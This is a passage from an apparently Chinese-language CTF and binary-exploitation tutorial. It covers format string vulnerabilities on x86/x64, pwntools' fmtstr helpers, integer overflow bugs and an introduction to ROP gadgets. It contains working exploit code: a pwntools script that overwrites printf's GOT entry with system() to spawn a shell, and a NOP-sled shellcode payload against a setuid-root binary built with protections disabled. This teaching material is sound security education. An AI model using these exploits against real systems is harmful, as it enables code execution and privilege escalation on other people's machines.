0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
gdb-peda$ finish
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x312
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
EIP: 0x8048520 (<main+138>: add esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048514 <main+126>: lea eax,[ebp-0x94]
0x804851a <main+132>: push eax
0x804851b <main+133>: call 0x8048350 <printf@plt>
=> 0x8048520 <main+138>: add esp,0x20
0x8048523 <main+141>: sub esp,0xc
0x8048526 <main+144>: push 0xa
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
0x804852d <main+151>: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x12345678
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
最后还得强调两点:
- 首先是需要关闭整个系统的 ASLR 保护,这可以保证栈在 gdb 环境中和直接运行中都保持不变,但这两个栈地址不一定相同
- 其次因为在 gdb 调试环境中的栈地址和直接运行程序是不一样的,所以我们需要结合格式化字符串漏洞读取内存,先泄露一个地址出来,然后根据泄露出来的地址计算实际地址
x86-64 中的格式化字符串漏洞
在 x64 体系中,多数调用惯例都是通过寄存器传递参数。在 Linux 上,前六个参数通过 RDI
、RSI
、RDX
、RCX
、R8
和 R9
传递;而在 Windows 中,前四个参数通过 RCX
、RDX
、R8
和 R9
来传递。
还是上面的程序,但是这次我们把它编译成 64 位:
$ gcc -fno-stack-protector -no-pie fmt.c
使用 AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.
作为输入:
gdb-peda$ n
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffff
RDX: 0x88888888
RSI: 0x1
RDI: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
RBP: 0x7fffffffe460 --> 0x400660 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffe3c0 --> 0x4241000000000000 ('')
RIP: 0x400648 (<main+113>: call 0x4004e0 <printf@plt>)
R8 : 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
R9 : 0xa ('\n')
R10: 0x7ffff7dd4380 --> 0x7ffff7dd0640 --> 0x7ffff7b9ed3a --> 0x636d656d5f5f0043 ('C')
R11: 0x246
R12: 0x400500 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe540 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x40063d <main+102>: mov r8,rdi
0x400640 <main+105>: mov rdi,rax
0x400643 <main+108>: mov eax,0x0
=> 0x400648 <main+113>: call 0x4004e0 <printf@plt>
0x40064d <main+118>: mov edi,0xa
0x400652 <main+123>: call 0x4004d0 <putchar@plt>
0x400657 <main+128>: nop
0x400658 <main+129>: leave
Guessed arguments:
arg[0]: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x4241000000000000 ('')
0008| 0x7fffffffe3c8 --> 0x4443 ('CD')
0016| 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0024| 0x7fffffffe3d8 ("%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0032| 0x7fffffffe3e0 (".%p.%p.%p.%p.%p.%p.%p.")
0040| 0x7fffffffe3e8 ("p.%p.%p.%p.%p.")
0048| 0x7fffffffe3f0 --> 0x2e70252e7025 ('%p.%p.')
0056| 0x7fffffffe3f8 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400648 in main ()
gdb-peda$ x/10g $rsp
0x7fffffffe3c0: 0x4241000000000000 0x0000000000004443
0x7fffffffe3d0: 0x4141414141414141 0x70252e70252e7025
0x7fffffffe3e0: 0x252e70252e70252e 0x2e70252e70252e70
0x7fffffffe3f0: 0x00002e70252e7025 0x0000000000000001
0x7fffffffe400: 0x0000000000f0b5ff 0x00000000000000c2
gdb-peda$ c
Continuing.
AAAAAAAA0x1.0x88888888.0xffffffff.0x7fffffffe3c6.0xa.0x4241000000000000.0x4443.0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.
可以看到我们最后的输出中,前五个数字分别来自寄存器 RSI
、RDX
、RCX
、R8
和 R9
,后面的数字才取自栈,0x4141414141414141
在 %8$p
的位置。这里还有个地方要注意,我们前面说的 Linux 有 6 个寄存器用于传递参数,可是这里只输出了 5 个,原因是有一个寄存器 RDI
被用于传递格式字符串,可以从 gdb 中看到,arg[0]
就是由 RDI
传递的格式字符串。(现在你可以再回到 x86 的相关内容,可以看到在 x86 中格式字符串通过栈传递的,但是同样的也不会被打印出来)其他的操作和 x86 没有什么大的区别,只是这时我们就不能修改 arg2
的值了,因为它被存入了寄存器中。
CTF 中的格式化字符串漏洞
pwntools pwnlib.fmtstr 模块
文档地址:http://pwntools.readthedocs.io/en/stable/fmtstr.html
该模块提供了一些字符串漏洞利用的工具。该模块中定义了一个类 FmtStr
和一个函数 fmtstr_payload
。
FmtStr
提供了自动化的字符串漏洞利用:
class pwnlib.fmtstr.FmtStr(execute_fmt, offset=None, padlen=0, numbwritten=0)
- execute_fmt (function):与漏洞进程进行交互的函数
- offset (int):你控制的第一个格式化程序的偏移量
- padlen (int):在 paylod 之前添加的 pad 的大小
- numbwritten (int):已经写入的字节数
fmtstr_payload
用于自动生成格式化字符串 paylod:
pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
- offset (int):你控制的第一个格式化程序的偏移量
- writes (dict):格式为 {addr: value, addr2: value2},用于往 addr 里写入 value 的值(常用:{printf_got})
- numbwritten (int):已经由 printf 函数写入的字节数
- write_size (str):必须是 byte,short 或 int。告诉你是要逐 byte 写,逐 short 写还是逐 int 写(hhn,hn或n)
我们通过一个例子来熟悉下该模块的使用(任意地址内存读写):fmt.c fmt
#include<stdio.h>
void main() {
char str[1024];
while(1) {
memset(str, '\0', 1024);
read(0, str, 1024);
printf(str);
fflush(stdout);
}
}
为了简单一点,我们关闭 ASLR,并使用下面的命令编译,关闭 PIE,使得程序的 .text .bss 等段的内存地址固定:
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c
很明显,程序存在格式化字符串漏洞,我们的思路是将 printf()
函数的地址改成 system()
函数的地址,这样当我们再次输入 /bin/sh
时,就可以获得 shell 了。
第一步先计算偏移,虽然 pwntools 中可以很方便地构造出 exp,但这里,我们还是先演示手工方法怎么做,最后再用 pwntools 的方法。在 gdb 中,先在 main
处下断点,运行程序,这时 libc 已经被加载进来了。我们输入 "AAAA" 试一下:
gdb-peda$ b main
...
gdb-peda$ r
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 ("AAAA\n")
EBX: 0x804a000 --> 0x8049f10 --> 0x1
ECX: 0xffffd1f0 ("AAAA\n")
EDX: 0x400
ESI: 0xf7f97000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
EIP: 0x8048512 (<main+92>: call 0x8048370 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x8048508 <main+82>: sub esp,0xc
0x804850b <main+85>: lea eax,[ebp-0x408]
0x8048511 <main+91>: push eax
=> 0x8048512 <main+92>: call 0x8048370 <printf@plt>
0x8048517 <main+97>: add esp,0x10
0x804851a <main+100>: mov eax,DWORD PTR [ebx-0x4]
0x8048520 <main+106>: mov eax,DWORD PTR [eax]
0x8048522 <main+108>: sub esp,0xc
Guessed arguments:
arg[0]: 0xffffd1f0 ("AAAA\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
0004| 0xffffd1e4 --> 0xffffd1f0 ("AAAA\n")
0008| 0xffffd1e8 --> 0x400
0012| 0xffffd1ec --> 0x80484d0 (<main+26>: add ebx,0x1b30)
0016| 0xffffd1f0 ("AAAA\n")
0020| 0xffffd1f4 --> 0xa ('\n')
0024| 0xffffd1f8 --> 0x0
0028| 0xffffd1fc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048512 in main ()
我们看到输入 printf()
的变量 arg[0]: 0xffffd1f0 ("AAAA\n")
在栈的第 5 行,除去第一个格式化字符串,即偏移量为 4。
读取重定位表获得 printf()
的 GOT 地址(第一列 Offset):
$ readelf -r a.out
Relocation section '.rel.dyn' at offset 0x2f4 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
08049ff8 00000406 R_386_GLOB_DAT 00000000 __gmon_start__
08049ffc 00000706 R_386_GLOB_DAT 00000000 stdout@GLIBC_2.0
Relocation section '.rel.plt' at offset 0x304 contains 5 entries:
Offset Info Type Sym.Value Sym. Name
0804a00c 00000107 R_386_JUMP_SLOT 00000000 read@GLIBC_2.0
0804a010 00000207 R_386_JUMP_SLOT 00000000 printf@GLIBC_2.0
0804a014 00000307 R_386_JUMP_SLOT 00000000 fflush@GLIBC_2.0
0804a018 00000507 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
0804a01c 00000607 R_386_JUMP_SLOT 00000000 memset@GLIBC_2.0
在 gdb 中获得 printf()
的虚拟地址:
gdb-peda$ p printf
$1 = {<text variable, no debug info>} 0xf7e26bf0 <printf>
获得 system()
的虚拟地址:
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e17060 <system>
好了,演示完怎样用手工的方式得到构造 exp 需要的信息,下面我们给出使用 pwntools 构造的完整漏洞利用代码:
# -*- coding: utf-8 -*-
from pwn import *
elf = ELF('./a.out')
r = process('./a.out')
libc = ELF('/usr/lib32/libc.so.6')
# 计算偏移量
def exec_fmt(payload):
r.sendline(payload)
info = r.recv()
return info
auto = FmtStr(exec_fmt)
offset = auto.offset
# 获得 printf 的 GOT 地址
printf_got = elf.got['printf']
log.success("printf_got => {}".format(hex(printf_got)))
# 获得 printf 的虚拟地址
payload = p32(printf_got) + '%{}$s'.format(offset)
r.send(payload)
printf_addr = u32(r.recv()[4:8])
log.success("printf_addr => {}".format(hex(printf_addr)))
# 获得 system 的虚拟地址
system_addr = printf_addr - (libc.symbols['printf'] - libc.symbols['system'])
log.success("system_addr => {}".format(hex(system_addr)))
payload = fmtstr_payload(offset, {printf_got : system_addr})
r.send(payload)
r.send('/bin/sh')
r.recv()
r.interactive()
$ python2 exp.py
[*] '/home/firmy/Desktop/RE4B/a.out'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './a.out': pid 17375
[*] '/usr/lib32/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Found format string offset: 4
[+] printf_got => 0x804a010
[+] printf_addr => 0xf7e26bf0
[+] system_addr => 0xf7e17060
[*] Switching to interactive mode
$ echo "hacked!"
hacked!
这样我们就获得了 shell,可以看到输出的信息和我们手工得到的信息完全相同。
3.1.2 整数溢出
什么是整数溢出
简介
在 C 语言基础的章节中,我们介绍了 C 语言整数的基础知识,下面我们详细介绍整数的安全问题。
由于整数在内存里面保存在一个固定长度的空间内,它能存储的最大值和最小值是固定的,如果我们尝试去存储一个数,而这个数又大于这个固定的最大值时,就会导致整数溢出。(x86-32 的数据模型是 ILP32,即整数(Int)、长整数(Long)和指针(Pointer)都是 32 位。)
整数溢出的危害
如果一个整数用来计算一些敏感数值,如缓冲区大小或数值索引,就会产生潜在的危险。通常情况下,整数溢出并没有改写额外的内存,不会直接导致任意代码执行,但是它会导致栈溢出和堆溢出,而后两者都会导致任意代码执行。由于整数溢出出现之后,很难被立即察觉,比较难用一个有效的方法去判断是否出现或者可能出现整数溢出。
整数溢出
关于整数的异常情况主要有三种:
- 溢出
- 只有有符号数才会发生溢出。有符号数最高位表示符号,在两正或两负相加时,有可能改变符号位的值,产生溢出
- 溢出标志
OF
可检测有符号数的溢出
- 回绕
- 无符号数
0-1
时会变成最大的数,如 1 字节的无符号数会变为255
,而255+1
会变成最小数0
。 - 进位标志
CF
可检测无符号数的回绕
- 无符号数
- 截断
- 将一个较大宽度的数存入一个宽度小的操作数中,高位发生截断
有符号整数溢出
- 上溢出
int i;
i = INT_MAX; // 2 147 483 647
i++;
printf("i = %d\n", i); // i = -2 147 483 648
- 下溢出
i = INT_MIN; // -2 147 483 648
i--;
printf("i = %d\n", i); // i = 2 147 483 647
无符号数回绕
涉及无符号数的计算永远不会溢出,因为不能用结果为无符号整数表示的结果值被该类型可以表示的最大值加 1 之和取模减(reduced modulo)。因为回绕,一个无符号整数表达式永远无法求出小于零的值。
使用下图直观地理解回绕,在轮上按顺时针方向将值递增产生的值紧挨着它:
unsigned int ui;
ui = UINT_MAX; // 在 x86-32 上为 4 294 967 295
ui++;
printf("ui = %u\n", ui); // ui = 0
ui = 0;
ui--;
printf("ui = %u\n", ui); // 在 x86-32 上,ui = 4 294 967 295
截断
- 加法截断:
0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)
- 乘法截断:
0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)
整型提升和宽度溢出
整型提升是指当计算表达式中包含了不同宽度的操作数时,较小宽度的操作数会被提升到和较大操作数一样的宽度,然后再进行计算。
示例:源码
#include<stdio.h>
void main() {
int l;
short s;
char c;
l = 0xabcddcba;
s = l;
c = l;
printf("宽度溢出\n");
printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);
printf("整型提升\n");
printf("s + c = 0x%x (%d bits)\n", s+c, sizeof(s+c) * 8);
}
$ ./a.out
宽度溢出
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
整型提升
s + c = 0xffffdc74 (32 bits)
使用 gdb 查看反汇编代码:
gdb-peda$ disassemble main
Dump of assembler code for function main:
0x0000056d <+0>: lea ecx,[esp+0x4]
0x00000571 <+4>: and esp,0xfffffff0
0x00000574 <+7>: push DWORD PTR [ecx-0x4]
0x00000577 <+10>: push ebp
0x00000578 <+11>: mov ebp,esp
0x0000057a <+13>: push ebx
0x0000057b <+14>: push ecx
0x0000057c <+15>: sub esp,0x10
0x0000057f <+18>: call 0x470 <__x86.get_pc_thunk.bx>
0x00000584 <+23>: add ebx,0x1a7c
0x0000058a <+29>: mov DWORD PTR [ebp-0xc],0xabcddcba
0x00000591 <+36>: mov eax,DWORD PTR [ebp-0xc]
0x00000594 <+39>: mov WORD PTR [ebp-0xe],ax
0x00000598 <+43>: mov eax,DWORD PTR [ebp-0xc]
0x0000059b <+46>: mov BYTE PTR [ebp-0xf],al
0x0000059e <+49>: sub esp,0xc
0x000005a1 <+52>: lea eax,[ebx-0x1940]
0x000005a7 <+58>: push eax
0x000005a8 <+59>: call 0x400 <puts@plt>
0x000005ad <+64>: add esp,0x10
0x000005b0 <+67>: sub esp,0x4
0x000005b3 <+70>: push 0x20
0x000005b5 <+72>: push DWORD PTR [ebp-0xc]
0x000005b8 <+75>: lea eax,[ebx-0x1933]
0x000005be <+81>: push eax
0x000005bf <+82>: call 0x3f0 <printf@plt>
0x000005c4 <+87>: add esp,0x10
0x000005c7 <+90>: movsx eax,WORD PTR [ebp-0xe]
0x000005cb <+94>: sub esp,0x4
0x000005ce <+97>: push 0x10
0x000005d0 <+99>: push eax
0x000005d1 <+100>: lea eax,[ebx-0x191f]
0x000005d7 <+106>: push eax
0x000005d8 <+107>: call 0x3f0 <printf@plt>
0x000005dd <+112>: add esp,0x10
0x000005e0 <+115>: movsx eax,BYTE PTR [ebp-0xf]
0x000005e4 <+119>: sub esp,0x4
0x000005e7 <+122>: push 0x8
0x000005e9 <+124>: push eax
0x000005ea <+125>: lea eax,[ebx-0x190b]
0x000005f0 <+131>: push eax
0x000005f1 <+132>: call 0x3f0 <printf@plt>
0x000005f6 <+137>: add esp,0x10
0x000005f9 <+140>: sub esp,0xc
0x000005fc <+143>: lea eax,[ebx-0x18f7]
0x00000602 <+149>: push eax
0x00000603 <+150>: call 0x400 <puts@plt>
0x00000608 <+155>: add esp,0x10
0x0000060b <+158>: movsx edx,WORD PTR [ebp-0xe]
0x0000060f <+162>: movsx eax,BYTE PTR [ebp-0xf]
0x00000613 <+166>: add eax,edx
0x00000615 <+168>: sub esp,0x4
0x00000618 <+171>: push 0x20
0x0000061a <+173>: push eax
0x0000061b <+174>: lea eax,[ebx-0x18ea]
0x00000621 <+180>: push eax
0x00000622 <+181>: call 0x3f0 <printf@plt>
0x00000627 <+186>: add esp,0x10
0x0000062a <+189>: nop
0x0000062b <+190>: lea esp,[ebp-0x8]
0x0000062e <+193>: pop ecx
0x0000062f <+194>: pop ebx
0x00000630 <+195>: pop ebp
0x00000631 <+196>: lea esp,[ecx-0x4]
0x00000634 <+199>: ret
End of assembler dump.
在整数转换的过程中,有可能导致下面的错误:
- 损失值:转换为值的大小不能表示的一种类型
- 损失符号:从有符号类型转换为无符号类型,导致损失符号
漏洞多发函数
我们说过整数溢出要配合上其他类型的缺陷才能有用,下面的两个函数都有一个 size_t
类型的参数,常常被误用而产生整数溢出,接着就可能导致缓冲区溢出漏洞。
#include <string.h>
void *memcpy(void *dest, const void *src, size_t n);
memcpy()
函数将 src
所指向的字符串中以 src
地址开始的前 n
个字节复制到 dest
所指的数组中,并返回 dest
。
#include <string.h>
char *strncpy(char *dest, const char *src, size_t n);
strncpy()
函数从源 src
所指的内存地址的起始位置开始复制 n
个字节到目标 dest
所指的内存地址的起始位置中。
两个函数中都有一个类型为 size_t
的参数,它是无符号整型的 sizeof
运算符的结果。
typedef unsigned int size_t;
整数溢出示例
现在我们已经知道了整数溢出的原理和主要形式,下面我们先看几个简单示例,然后实际操作利用一个整数溢出漏洞。
示例
示例一,整数转换:
char buf[80];
void vulnerable() {
int len = read_int_from_network();
char *p = read_string_from_network();
if (len > 80) {
error("length too large: bad dog, no cookie for you!");
return;
}
memcpy(buf, p, len);
}
这个例子的问题在于,如果攻击者给 len
赋于了一个负数,则可以绕过 if
语句的检测,而执行到 memcpy()
的时候,由于第三个参数是 size_t
类型,负数 len
会被转换为一个无符号整型,它可能是一个非常大的正数,从而复制了大量的内容到 buf
中,引发了缓冲区溢出。
示例二,回绕和溢出:
void vulnerable() {
size_t len;
// int len;
char* buf;
len = read_int_from_network();
buf = malloc(len + 5);
read(fd, buf, len);
...
}
这个例子看似避开了缓冲区溢出的问题,但是如果 len
过大,len+5
有可能发生回绕。比如说,在 x86-32 上,如果 len = 0xFFFFFFFF
,则 len+5 = 0x00000004
,这时 malloc()
只分配了 4 字节的内存区域,然后在里面写入大量的数据,缓冲区溢出也就发生了。(如果将 len
声明为有符号 int
类型,len+5
可能发生溢出)
示例三,截断:
void main(int argc, char *argv[]) {
unsigned short int total;
total = strlen(argv[1]) + strlen(argv[2]) + 1;
char *buf = (char *)malloc(total);
strcpy(buf, argv[1]);
strcat(buf, argv[2]);
...
}
这个例子接受两个字符串类型的参数并计算它们的总长度,程序分配足够的内存来存储拼接后的字符串。首先将第一个字符串参数复制到缓冲区中,然后将第二个参数连接到尾部。如果攻击者提供的两个字符串总长度无法用 total
表示,则会发生截断,从而导致后面的缓冲区溢出。
实战
看了上面的示例,我们来真正利用一个整数溢出漏洞。源码
#include<stdio.h>
#include<string.h>
void validate_passwd(char *passwd) {
char passwd_buf[11];
unsigned char passwd_len = strlen(passwd);
if(passwd_len >= 4 && passwd_len <= 8) {
printf("good!\n");
strcpy(passwd_buf, passwd);
} else {
printf("bad!\n");
}
}
int main(int argc, char *argv[]) {
if(argc != 2) {
printf("error\n");
return 0;
}
validate_passwd(argv[1]);
}
上面的程序中 strlen()
返回类型是 size_t
,却被存储在无符号字符串类型中,任意超过无符号字符串最大上限值(256 字节)的数据都会导致截断异常。当密码长度为 261 时,截断后值变为 5,成功绕过了 if
的判断,导致栈溢出。下面我们利用溢出漏洞来获得 shell。
编译命令:
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -g -fno-stack-protector -z execstack vuln.c
$ sudo chown root vuln
$ sudo chgrp root vuln
$ sudo chmod +s vuln
使用 gdb 反汇编 validate_passwd
函数。
gdb-peda$ disassemble validate_passwd
Dump of assembler code for function validate_passwd:
0x0000059d <+0>: push ebp ; 压入 ebp
0x0000059e <+1>: mov ebp,esp
0x000005a0 <+3>: push ebx ; 压入 ebx
0x000005a1 <+4>: sub esp,0x14
0x000005a4 <+7>: call 0x4a0 <__x86.get_pc_thunk.bx>
0x000005a9 <+12>: add ebx,0x1a57
0x000005af <+18>: sub esp,0xc
0x000005b2 <+21>: push DWORD PTR [ebp+0x8]
0x000005b5 <+24>: call 0x430 <strlen@plt>
0x000005ba <+29>: add esp,0x10
0x000005bd <+32>: mov BYTE PTR [ebp-0x9],al ; 将 len 存入 [ebp-0x9]
0x000005c0 <+35>: cmp BYTE PTR [ebp-0x9],0x3
0x000005c4 <+39>: jbe 0x5f2 <validate_passwd+85>
0x000005c6 <+41>: cmp BYTE PTR [ebp-0x9],0x8
0x000005ca <+45>: ja 0x5f2 <validate_passwd+85>
0x000005cc <+47>: sub esp,0xc
0x000005cf <+50>: lea eax,[ebx-0x1910]
0x000005d5 <+56>: push eax
0x000005d6 <+57>: call 0x420 <puts@plt>
0x000005db <+62>: add esp,0x10
0x000005de <+65>: sub esp,0x8
0x000005e1 <+68>: push DWORD PTR [ebp+0x8]
0x000005e4 <+71>: lea eax,[ebp-0x14] ; 取 passwd_buf 地址
0x000005e7 <+74>: push eax ; 压入 passwd_buf
0x000005e8 <+75>: call 0x410 <strcpy@plt>
0x000005ed <+80>: add esp,0x10
0x000005f0 <+83>: jmp 0x604 <validate_passwd+103>
0x000005f2 <+85>: sub esp,0xc
0x000005f5 <+88>: lea eax,[ebx-0x190a]
0x000005fb <+94>: push eax
0x000005fc <+95>: call 0x420 <puts@plt>
0x00000601 <+100>: add esp,0x10
0x00000604 <+103>: nop
0x00000605 <+104>: mov ebx,DWORD PTR [ebp-0x4]
0x00000608 <+107>: leave
0x00000609 <+108>: ret
End of assembler dump.
通过阅读反汇编代码,我们知道缓冲区 passwd_buf
位于 ebp=0x14
的位置(0x000005e4 <+71>: lea eax,[ebp-0x14]
),而返回地址在 ebp+4
的位置,所以返回地址相对于缓冲区 0x18
的位置。我们测试一下:
gdb-peda$ r `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/a.out `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
good!
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd0f4 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd490 --> 0x534c0043 ('C')
EDX: 0xffffd1f8 --> 0xffff0043 --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd110 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd110 ('C' <repeats 200 times>...)
0004| 0xffffd114 ('C' <repeats 200 times>...)
0008| 0xffffd118 ('C' <repeats 200 times>...)
0012| 0xffffd11c ('C' <repeats 200 times>...)
0016| 0xffffd120 ('C' <repeats 200 times>...)
0020| 0xffffd124 ('C' <repeats 200 times>...)
0024| 0xffffd128 ('C' <repeats 200 times>...)
0028| 0xffffd12c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
可以看到 EIP
被 BBBB
覆盖,相当于我们获得了返回地址的控制权。构建下面的 payload:
from pwn import *
ret_addr = 0xffffd118 # ebp = 0xffffd108
shellcode = shellcraft.i386.sh()
payload = "A" * 24
payload += p32(ret_addr)
payload += "\x90" * 20
payload += asm(shellcode)
payload += "C" * 169 # 24 + 4 + 20 + 44 + 169 = 261
3.1.4 返回导向编程(ROP)
- ROP 简介
- ROP Emporium
- 更多资料
ROP 简介
返回导向编程(Return-Oriented Programming,缩写:ROP)是一种高级的内存攻击技术,该技术允许攻击者在现代操作系统的各种通用防御下执行代码,如内存不可执行和代码签名等。这类攻击往往利用操作堆栈调用时的程序漏洞,通常是缓冲区溢出。攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列(gadgets),每一段 gadget 通常以 return 指令(ret
,机器码为c3
)结束,并位于共享库代码中的子程序中。通过执行这些指令序列,也就控制了程序的执行。
ret
指令相当于 pop eip
。即,首先将 esp
指向的 4 字节内容读取并赋值给 eip
,然后 esp
加上 4 字节指向栈的下一个位置。如果当前执行的指令序列仍然以 ret
指令结束,则这个过程将重复, esp
再次增加并且执行下一个指令序列。
寻找 gadgets
- 在程序中寻找所有的 c3(ret) 字节
- 向前搜索,看前面的字节是否包含一个有效指令,这里可以指定最大搜索字节数,以获得不同长度的 gadgets
- 记录下我们找到的所有有效指令序列
理论上我们是可以这样寻找 gadgets 的,但实际上有很多工具可以完成这个工作,如 ROPgadget,Ropper 等。更完整的搜索可以使用 http://ropshell.com/。
常用的 gadgets
对于 gadgets 能做的事情,基本上只要你敢想,它就敢执行。下面简单介绍几种用法:
- 保存栈数据到寄存器
- 将栈顶的数据抛出并保存到寄存器中,然后跳转到新的栈顶地址。所以当返回地址被一个 gadgets 的地址覆盖,程序将在返回后执行该指令序列。
- 如:
pop eax; ret
- 保存内存数据到寄存器
- 将内存地址处的数据加载到内存器中。
- 如:
mov ecx,[eax]; ret
- 保存寄存器数据到内存
- 将寄存器的值保存到内存地址处。
- 如:
mov [eax],ecx; ret
- 算数和逻辑运算
- add, sub, mul, xor 等。
- 如:
add eax,ebx; ret
,xor edx,edx; ret
- 系统调用
- 执行内核中断
- 如:
int 0x80; ret
,call gs:[0x10]; ret
- 会影响栈帧的 gadgets
- 这些 gadgets 会改变 ebp 的值,从而影响栈帧,在一些操作如 stack pivot 时我们需要这样的指令来转移栈帧。
- 如:
leave; ret
,pop ebp; ret
ROP Emporium
ROP Emporium 提供了一系列用于学习 ROP 的挑战,每一个挑战都介绍了一个知识,难度也逐渐增加,是循序渐进学习 ROP 的好资料。ROP Emporium 还有个特点是它专注于 ROP,所有挑战都有相同的漏洞点,不同的只是 ROP 链构造的不同,所以不涉及其他的漏洞利用和逆向的内容。每个挑战都包含了 32 位和 64 位的程序,通过对比能帮助我们理解 ROP 链在不同体系结构下的差异,例如参数的传递等。这篇文章我们就从这些挑战中来学习吧。
这些挑战都包含一个 flag.txt
的文件,我们的目标就是通过控制程序执行,来打印出文件中的内容。当然你也可以尝试获得 shell。
ret2win32
通常情况下,对于一个有缓冲区溢出的程序,我们通常先输入一定数量的字符填满缓冲区,然后是精心构造的 ROP 链,通过覆盖堆栈上保存的返回地址来实现函数跳转(关于缓冲区溢出请查看上一章 3.1.3栈溢出)。
第一个挑战我会尽量详细一点,因为所有挑战程序都有相似的结构,缓冲区大小都一样,我们看一下漏洞函数:
gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
0x080485f6 <+0>: push ebp
0x080485f7 <+1>: mov ebp,esp
0x080485f9 <+3>: sub esp,0x28
0x080485fc <+6>: sub esp,0x4
0x080485ff <+9>: push 0x20
0x08048601 <+11>: push 0x0
0x08048603 <+13>: lea eax,[ebp-0x28]
0x08048606 <+16>: push eax
0x08048607 <+17>: call 0x8048460 <memset@plt>
0x0804860c <+22>: add esp,0x10
0x0804860f <+25>: sub esp,0xc
0x08048612 <+28>: push 0x804873c
